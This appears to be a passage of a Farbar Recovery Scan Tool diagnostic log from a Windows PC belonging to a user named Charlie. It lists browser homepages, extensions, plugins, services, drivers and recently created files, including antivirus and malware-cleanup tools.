ShortcutTarget: Install LastPass FF RunOnce.lnk -> C:\Program Files (x86)\Common Files\lpuninstall.exe (LastPass)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Install LastPass IE RunOnce.lnk [2016-01-21]
ShortcutTarget: Install LastPass IE RunOnce.lnk -> C:\Program Files (x86)\Common Files\lpuninstall.exe (LastPass)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{39b18a1c-5701-477d-9ff3-4fc1ef99d818}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{4fb4f4e8-d31d-4459-aeb2-9f787b0aea73}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome
HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://drudgereport.com/
hxxps://www.google.com/?gws_rd=ssl
HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/?ocid=iehp
SearchScopes: HKLM -> DefaultScope {07598D8A-E22A-4197-96BD-C92B41887BBB} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-e3963092&q={searchTerms}
SearchScopes: HKLM -> {07598D8A-E22A-4197-96BD-C92B41887BBB} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-e3963092&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1808445638-3246226358-2469192111-1000 -> DefaultScope {07598D8A-E22A-4197-96BD-C92B41887BBB} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-e3963092&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1808445638-3246226358-2469192111-1000 -> {07598D8A-E22A-4197-96BD-C92B41887BBB} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-e3963092&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1808445638-3246226358-2469192111-1000 -> {d4fee3d1-1014-4db8-a824-573bf9ab51c7} URL =
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2017-11-10] (Microsoft Corporation)
BHO: LastPass Vault -> {95D9ECF5-2A4D-4550-BE49-70D42F71296E} -> C:\Program Files (x86)\LastPass\LPToolbar_x64.dll [2016-01-21] (LastPass)
BHO: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\SetPointSmooth.dll [2015-08-25] (Logitech, Inc.)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2017-11-10] (Microsoft Corporation)
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\Office16\OCHelper.dll [2017-10-22] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_151\bin\ssv.dll [2017-10-25] (Oracle Corporation)
BHO-x32: LastPass Vault -> {95D9ECF5-2A4D-4550-BE49-70D42F71296E} -> C:\Program Files (x86)\LastPass\LPToolbar.dll [2016-01-21] (LastPass)
BHO-x32: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\32-bit\SetPointSmooth.dll [2015-08-25] (Logitech, Inc.)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\Office16\GROOVEEX.DLL [2017-11-10] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_151\bin\jp2ssv.dll [2017-10-25] (Oracle Corporation)
Toolbar: HKLM - LastPass Toolbar - {9f6b5cc3-5c7b-4b5c-97af-19dec1e380e5} - C:\Program Files (x86)\LastPass\LPToolbar_x64.dll [2016-01-21] (LastPass)
Toolbar: HKLM-x32 - LastPass Toolbar - {9f6b5cc3-5c7b-4b5c-97af-19dec1e380e5} - C:\Program Files (x86)\LastPass\LPToolbar.dll [2016-01-21] (LastPass)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-11-10] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-11-10] (Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-11-10] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-11-10] (Microsoft Corporation)

FireFox:
========
FF DefaultProfile: 9p71s5n4.default-1495840635264
FF ProfilePath: C:\Users\Charlie\AppData\Roaming\Mozilla\Firefox\Profiles\ar71qvt0.default-1481902172278 [2017-11-12]
FF Homepage: Mozilla\Firefox\Profiles\ar71qvt0.default-1481902172278 -> hxxp://www.drudgereport.com/
hxxp://www.washingtontimes.com/
hxxp://www.realclearpolitics.com/index.html
hxxp://www.newsmax.com/
hxxp://dailycaller.com/?refresh=true
hxxps://mail.google.com/mail/u/0/?shva=1#inbox
hxxps://calendar.google.com/calendar/render?tab=mc#g%7Cmonth-3+22844+22881+22857
FF Extension: (IBM Security Rapport) - C:\Users\Charlie\AppData\Roaming\Mozilla\Extensions\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}\rapportext@trusteer.com.xpi [2017-11-10]
FF Extension: (LastPass) - C:\Users\Charlie\AppData\Roaming\Mozilla\Firefox\Profiles\ar71qvt0.default-1481902172278\Extensions\support@lastpass.com [2016-12-17]
FF Extension: (ColorfulTabs) - C:\Users\Charlie\AppData\Roaming\Mozilla\Firefox\Profiles\ar71qvt0.default-1481902172278\Extensions\{0545b830-f0aa-4d7e-8820-50a4629a56fe} [2016-12-20]
FF Extension: (Adblock Plus) - C:\Users\Charlie\AppData\Roaming\Mozilla\Firefox\Profiles\ar71qvt0.default-1481902172278\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-12-16]
FF Extension: (YouTube Flash Video Player) - C:\Users\Charlie\AppData\Roaming\Mozilla\Firefox\Profiles\ar71qvt0.default-1481902172278\Extensions\{f3bd3dd2-2888-44c5-91a2-2caeb33fb898}.xpi [2016-12-28]
FF ProfilePath: C:\Users\Charlie\AppData\Roaming\Mozilla\Firefox\Profiles\9p71s5n4.default-1495840635264 [2017-11-13]
FF Homepage: Mozilla\Firefox\Profiles\9p71s5n4.default-1495840635264 -> hxxp://www.drudgereport.com/
hxxps://www.washingtontimes.com/
hxxps://www.realclearpolitics.com/index.html
hxxps://mail.google.com/mail/u/0/?shva=1
hxxps://auth.weightwatchers.com/login/?goto=hxxp:%2F%2Fauth.weightwatchers.com%2Fopenam%2Foauth2%2Fauthorize%3Fresponse_type%3Did_token%26client_id%3DwebCMX%26scope%3Dopenid%2520session%26redirect_uri%3Dhttps%253A%252F%252Fcmx.weightwatchers.com%252Fauth%26nonce%3Db88927f21ca2121cd0066634fcf78dee%26state%3Dhttp%253A%252F%252Fcmx.weightwatchers.com%252F
FF Extension: (Safe Browsing Version 4 (temporary add-on)) - C:\Users\Charlie\AppData\Roaming\Mozilla\Firefox\Profiles\9p71s5n4.default-1495840635264\Extensions\sbv4-gradual-rollout@mozilla.com.xpi [2017-11-08]
FF Extension: (LastPass: Free Password Manager) - C:\Users\Charlie\AppData\Roaming\Mozilla\Firefox\Profiles\9p71s5n4.default-1495840635264\Extensions\support@lastpass.com [2017-10-21]
FF Extension: (Adblock Plus) - C:\Users\Charlie\AppData\Roaming\Mozilla\Firefox\Profiles\9p71s5n4.default-1495840635264\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2017-11-08]
FF HKLM-x32\...\Firefox\Extensions: [{F003DA68-8256-4b37-A6C4-350FA04494DF}] - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt
FF Extension: (Logitech SetPoint) - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt [2016-01-27] [not signed]
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_27_0_0_183.dll [2017-10-25] ()
FF Plugin: @lastpass.com/NPLastPass -> C:\Program Files (x86)\LastPass\nplastpass64.dll [2016-01-21] (LastPass)
FF Plugin: @mcafee.com/MSC,version=10 -> C:\Program Files\mcafee\msc\npMcSnFFPl64.dll [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_27_0_0_183.dll [2017-10-25] ()
FF Plugin-x32: @canon.com/EPPEX -> C:\Program Files (x86)\Canon\My Image Garden\AddOn\CIG\npmigfpi.dll [2011-11-30] (CANON INC.)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-12-09] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-12-09] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.151.2 -> C:\Program Files (x86)\Java\jre1.8.0_151\bin\dtplugin\npDeployJava1.dll [2017-10-25] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.151.2 -> C:\Program Files (x86)\Java\jre1.8.0_151\bin\plugin2\npjp2.dll [2017-10-25] (Oracle Corporation)
FF Plugin-x32: @lastpass.com/NPLastPass -> C:\Program Files (x86)\LastPass\nplastpass64.dll [2016-01-21] (LastPass)
FF Plugin-x32: @mcafee.com/MSC,version=10 -> C:\Program Files (x86)\McAfee\msc\npMcSnFFPl.dll [No File]
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2017-10-22] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2017-10-22] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-28] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-28] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2017-03-28] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Charlie\AppData\Roaming\mozilla\plugins\npatgpc.dll [2014-08-05] (Cisco WebEx LLC)

Chrome:
=======
CHR DefaultProfile: Default
CHR HomePage: Default -> mysearch.avg.com
CHR StartupUrls: Default -> "hxxps://mail.google.com/mail/u/0/?shva=1#inbox"
CHR DefaultSearchURL: Default -> hxxps://mysearch.avg.com/search?rvt=1&sap=dsp&q={searchTerms}
CHR DefaultSearchKeyword: Default -> hxxps://mysearch.avg.com
CHR DefaultSuggestURL: Default -> hxxps://toolbar.avg.com/acp?q={searchTerms}&o=1
CHR Profile: C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default [2017-11-13]
CHR Extension: (Slides) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-11-12]
CHR Extension: (Docs) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-11-12]
CHR Extension: (Google Drive) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-11-12]
CHR Extension: (IBM Security Rapport) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\bbjllphbppobebmjpjcijfbakobcheof [2017-11-12]
CHR Extension: (YouTube) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-11-12]
CHR Extension: (Sheets) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-11-12]
CHR Extension: (Google Docs Offline) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-11-12]
CHR Extension: (LastPass: Free Password Manager) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdokiejnpimakedhajhdlcegeplioahd [2017-11-12]
CHR Extension: (AVG SafePrice) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\mbckjcfnjmoiinpgddefodcighgikkgn [2017-11-12]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-11-12]
CHR Extension: (Gmail) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-11-12]
CHR Extension: (Chrome Media Router) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-11-12]
CHR HKLM\...\Chrome\Extension: [hdokiejnpimakedhajhdlcegeplioahd] - hxxp://clients2.google.com/service/update2/crx
CHR HKU\.DEFAULT\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bbjllphbppobebmjpjcijfbakobcheof] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bbjllphbppobebmjpjcijfbakobcheof] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [chfdnecihphmhljaaejmgoiahnihplgn] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [mbckjcfnjmoiinpgddefodcighgikkgn] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [hdokiejnpimakedhajhdlcegeplioahd] - hxxp://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S2 AVG Antivirus; C:\Program Files (x86)\AVG\Antivirus\AVGSvc.exe [282536 2017-10-20] (AVG Technologies CZ, s.r.o.)
S3 AVG Firewall; C:\Program Files (x86)\AVG\Antivirus\afwServ.exe [331952 2017-10-20] (AVG Technologies CZ, s.r.o.)
S3 avgbIDSAgent; C:\Program Files (x86)\AVG\Antivirus\x64\aswidsagenta.exe [7496672 2017-10-20] (AVG Technologies CZ, s.r.o.)
S2 avgsvc; C:\Program Files (x86)\AVG\Framework\Common\avgsvca.exe [1428656 2017-10-31] (AVG Technologies CZ, s.r.o.)
S2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [8063656 2017-10-31] (Microsoft Corporation)
S2 Dell Customer Connect; C:\Program Files (x86)\Dell Customer Connect\DCCService.exe [130936 2017-09-19] (Dell Inc.)
S2 Dell Foundation Services; C:\Program Files\Dell\Dell Foundation Services\DFSSvc.exe [97616 2017-01-11] (Dell)
S2 DellDataVault; C:\Program Files\Dell\DellDataVault\DellDataVault.exe [2571352 2016-01-05] (Dell Inc.)
S2 DellUpdate; C:\Program Files (x86)\Dell Update\DellUpService.exe [230248 2017-05-01] (Dell Inc.)
S2 Garmin Device Interaction Service; C:\Program Files (x86)\Garmin\Device Interaction Service\GarminService.exe [1099280 2017-03-28] (Garmin Ltd. or its subsidiaries)
S2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [14696 2013-07-30] (Intel Corporation)
S2 igfxCUIService2.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [382456 2017-03-13] (Intel Corporation)
S2 Intel(R) Capability Licensing Service Interface; c:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [File not signed]
S3 Intel(R) Capability Licensing Service TCP IP Interface; c:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation)
S2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-12-09] (Intel Corporation)
S2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6058960 2017-08-21] (Malwarebytes)
S2 Net Driver HPZ12; C:\Windows\System32\HPZinw12.dll [50688 2015-10-30] (HP Inc.) [File not signed]
S2 Pml Driver HPZ12; C:\Windows\System32\HPZipm12.dll [66048 2015-10-30] (HP Inc.) [File not signed]
S2 RapportMgmtService; C:\Program Files (x86)\Trusteer\Rapport\bin\RapportMgmtService.exe [2350064 2017-09-28] (IBM Corp.)
S4 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [312056 2015-08-04] (Realtek Semiconductor)
S4 Seagate Dashboard Services; C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\Seagate.Dashboard.DASWindowsService.exe [16216 2015-07-15] (Seagate Technology LLC)
S4 Seagate MobileBackup Service; C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\MobileService.exe [143656 2015-07-15] (Seagate Technology LLC)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [3913064 2017-03-18] (Microsoft Corporation)
S4 SftService; C:\Program Files (x86)\Dell Backup and Recovery\sftservice.exe [2065808 2016-01-04] (SoftThinks SAS)
S4 SupportAssistAgent; C:\Program Files (x86)\Dell\SupportAssistAgent\bin\SupportAssistAgent.exe [31928 2016-04-22] (Dell Inc.)
S2 TuneUp.UtilitiesSvc; C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesService64.exe [5906704 2017-07-26] (AVG Technologies CZ, s.r.o.)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [342264 2017-03-18] (Microsoft Corporation)
S2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [102816 2017-07-11] (Microsoft Corporation)
S4 ZAtheros Wlan Agent; C:\Program Files (x86)\Dell Wireless\Ath_WlanAgent.exe [81536 2014-05-13] (Atheros) [File not signed]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 athr; C:\WINDOWS\System32\drivers\athw10x.sys [4599728 2017-02-22] (Qualcomm Atheros Communications, Inc.)
S3 avgbdisk; C:\WINDOWS\system32\drivers\avgbdiska.sys [166624 2017-10-20] (AVG Technologies CZ, s.r.o.)
S3 avgbidsdriver; C:\WINDOWS\system32\drivers\avgbidsdrivera.sys [314640 2017-10-20] (AVG Technologies CZ, s.r.o.)
S3 avgbidsh; C:\WINDOWS\system32\drivers\avgbidsha.sys [192584 2017-10-20] (AVG Technologies CZ, s.r.o.)
S3 avgblog; C:\WINDOWS\system32\drivers\avgbloga.sys [336896 2017-10-20] (AVG Technologies CZ, s.r.o.)
S3 avgbuniv; C:\WINDOWS\system32\drivers\avgbuniva.sys [51336 2017-10-20] (AVG Technologies CZ, s.r.o.)
S3 avgHwid; C:\WINDOWS\system32\drivers\avgHwid.sys [39424 2017-10-20] (AVG Technologies CZ, s.r.o.)
S2 avgMonFlt; C:\WINDOWS\system32\drivers\avgMonFlt.sys [140192 2017-10-20] (AVG Technologies CZ, s.r.o.)
S3 avgNetSec; C:\WINDOWS\system32\drivers\avgNetSec.sys [548568 2017-10-20] (AVG Technologies CZ, s.r.o.)
S3 avgRdr; C:\WINDOWS\system32\drivers\avgRdr2.sys [102792 2017-10-20] (AVG Technologies CZ, s.r.o.)
S0 avgRvrt; C:\WINDOWS\system32\drivers\avgRvrt.sys [76832 2017-10-20] (AVG Technologies CZ, s.r.o.)
S3 avgSnx; C:\WINDOWS\system32\drivers\avgSnx.sys [1022288 2017-10-26] (AVG Technologies CZ, s.r.o.)
S1 avgSP; C:\WINDOWS\system32\drivers\avgSP.sys [579584 2017-10-20] (AVG Technologies CZ, s.r.o.)
S3 avgStm; C:\WINDOWS\system32\drivers\avgStm.sys [193768 2017-10-20] (AVG Technologies CZ, s.r.o.)
S3 avgVmm; C:\WINDOWS\system32\drivers\avgVmm.sys [355856 2017-10-20] (AVG Technologies CZ, s.r.o.)
S3 DDDriver; C:\WINDOWS\system32\drivers\DDDriver64Dcsa.sys [32464 2016-01-05] (Dell Computer Corporation)
S3 DellProf; C:\WINDOWS\system32\drivers\DellProf.sys [24240 2016-01-05] (Dell Computer Corporation)
R3 dot4; C:\WINDOWS\system32\DRIVERS\Dot4.sys [146856 2013-06-04] (Windows (R) Win 7 DDK provider)
S3 Dot4Print; C:\WINDOWS\System32\drivers\Dot4Prt.sys [21928 2013-06-04] (Windows (R) Win 7 DDK provider)
S3 epmntdrv; C:\WINDOWS\system32\epmntdrv.sys [33448 2016-12-07] ()
S3 epmntdrv; C:\WINDOWS\SysWOW64\epmntdrv.sys [21496 2016-01-14] ()
S1 ESProtectionDriver; C:\WINDOWS\system32\drivers\mbae64.sys [77440 2017-10-07] ()
S3 EuGdiDrv; C:\WINDOWS\system32\EuGdiDrv.sys [10848 2016-07-11] () [File not signed]
S3 EuGdiDrv; C:\WINDOWS\SysWOW64\EuGdiDrv.sys [10208 2016-07-11] () [File not signed]
S2 MBAMChameleon; C:\WINDOWS\System32\Drivers\MbamChameleon.sys [192952 2017-10-07] (Malwarebytes)
S3 MBAMFarflt; C:\WINDOWS\system32\DRIVERS\farflt.sys [110016 2017-11-12] (Malwarebytes)
S3 MBAMProtection; C:\WINDOWS\system32\DRIVERS\mbam.sys [45504 2017-11-12] (Malwarebytes)
S3 MBAMSwissArmy; C:\WINDOWS\System32\Drivers\mbamswissarmy.sys [252232 2017-11-12] (Malwarebytes)
S3 MBAMWebProtection; C:\WINDOWS\system32\DRIVERS\mwac.sys [94144 2017-11-13] (Malwarebytes)
R3 MEIx64; C:\WINDOWS\system32\DRIVERS\TeeDriverx64.sys [100312 2013-12-09] (Intel Corporation)
S1 RapportAegle64; C:\Program Files (x86)\Trusteer\Rapport\bin\x64\RapportAegle64.sys [384312 2017-09-28] (IBM Corp.)
S1 RapportCerberus_1804077; C:\ProgramData\Trusteer\Rapport\store\exts\RapportCerberus\baseline\RapportCerberus64_1804077.sys [1271448 2017-10-01] (IBM Corp.)
S1 RapportEI64; C:\Program Files (x86)\Trusteer\Rapport\bin\x64\RapportEI64.sys [585432 2017-09-28] (IBM Corp.)
S0 RapportHades64; C:\WINDOWS\System32\Drivers\RapportHades64.sys [253912 2017-09-28] (IBM Corp.)
S0 RapportKE64; C:\WINDOWS\System32\Drivers\RapportKE64.sys [507960 2017-09-28] (IBM Corp.)
S1 RapportPG64; C:\Program Files (x86)\Trusteer\Rapport\bin\x64\RapportPG64.sys [610616 2017-09-28] (IBM Corp.)
R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [896752 2016-12-15] (Realtek )
R3 RTSUER; C:\WINDOWS\system32\Drivers\RtsUer.sys [402136 2015-06-10] (Realsil Semiconductor Corporation)
S3 SDFRd; C:\WINDOWS\System32\drivers\SDFRd.sys [31128 2017-03-18] ()
U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [28272 2017-11-12] ()
S3 TuneUpUtilitiesDrv; C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesDriver64.sys [32304 2016-06-01] (AVG Netherlands B.V.)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44632 2017-03-18] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [294816 2017-03-18] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [121248 2017-03-18] (Microsoft Corporation)
U3 idsvc; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-11-12 21:10 - 2017-11-12 21:10 - 000028272 _____ C:\WINDOWS\system32\Drivers\TrueSight.sys
2017-11-12 21:09 - 2017-11-12 21:45 - 000000000 ____D C:\ProgramData\RogueKiller
2017-11-12 20:53 - 2017-11-12 20:54 - 026828360 _____ (Adlice Software) C:\Users\Charlie\Desktop\RogueKiller_portable64.exe
2017-11-12 20:52 - 2017-11-12 20:52 - 008261584 _____ (Malwarebytes) C:\Users\Charlie\Desktop\AdwCleaner.exe
2017-11-12 20:47 - 2017-11-12 20:47 - 000001940 _____ C:\Users\Charlie\Desktop\next steps.txt
2017-11-12 20:35 - 2017-11-12 20:35 - 000043066 _____ C:\Users\Charlie\Downloads\20171102_BANK_credit_card_8821.pdf
2017-11-11 19:19 - 2017-11-11 19:19 - 000004211 _____ C:\Users\Charlie\Downloads\google(2).csv
2017-11-10 16:13 - 2017-11-13 09:28 - 000027829 _____ C:\Users\Charlie\Desktop\FRST.txt
2017-11-10 16:13 - 2017-11-13 09:27 - 000000000 ____D C:\FRST
2017-11-10 16:12 - 2017-11-13 09:26 - 000000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job
2017-11-10 16:11 - 2017-11-13 09:27 - 000439556 _____ C:\WINDOWS\ntbtlog.txt
2017-11-10 14:41 - 2017-11-12 17:02 - 002392576 _____ (Farbar) C:\Users\Charlie\Desktop\FRST64.exe
2017-11-03 10:07 - 2017-11-03 10:07 - 001434164 _____ C:\Users\Charlie\Downloads\PubsHandler.ashx
2017-10-30 16:04 - 2017-10-30 16:11 - 007791398 _____ C:\Users\Charlie\Documents\IMG_20171030_0001.pdf
2017-10-25 20:38 - 2017-10-25 20:38 - 000389384 _____ C:\Users\Charlie\Downloads\viewDownload.go
2017-10-25 13:41 - 2017-10-25 13:41 - 000000000 ____D C:\Program Files (x86)\Dell Customer Connect
2017-10-24 09:46 - 2017-10-24 09:46 - 000210369 _____ C:\Users\Charlie\Downloads\YearEndSummary_2017(1).pdf
2017-10-24 09:37 - 2017-10-24 09:37 - 000210358 _____ C:\Users\Charlie\Downloads\YearEndSummary_2017.pdf
2017-10-24 09:36 - 2017-10-24 09:36 - 000146457 _____ C:\Users\Charlie\Downloads\YearEndSummary_2016.pdf
2017-10-24 09:33 - 2017-10-24 09:33 - 000514225 _____ C:\Users\Charlie\Downloads\retrievedocument.pdf
2017-10-24 09:24 - 2017-11-01 09:55 - 000031361 _____ C:\Users\Charlie\Desktop\Checks  1000.xlsx
2017-10-20 14:00 - 2017-10-20 14:00 - 000028249 _____ C:\Users\Charlie\Documents\IMG_20171020_0001.pdf
2017-10-20 13:44 - 2017-10-20 13:44 - 000209448 _____ C:\Users\Charlie\Downloads\birth cert appl_20170627.pdf
2017-10-20 06:24 - 2017-10-20 06:24 - 000402608 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\avgBoot.exe
2017-10-17 19:52 - 2017-10-17 19:52 - 000096098 _____ C:\Users\Charlie\Downloads\amsler_grid_eye_test.pdf
2017-10-17 07:02 - 2017-10-17 07:03 - 001361928 _____ C:\Users\Charlie\Downloads\ElfPDFStream (2).pdf

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-11-13 09:27 - 2016-01-19 12:43 - 000000000 ___RD C:\Users\Charlie\Desktop\Security & Utilities
2017-11-13 09:24 - 2017-03-18 06:40 - 001310720 _____ C:\WINDOWS\system32\config\BBI
2017-11-13 09:23 - 2017-09-02 03:05 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-11-13 09:09 - 2017-10-07 21:09 - 000094144 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mwac.sys
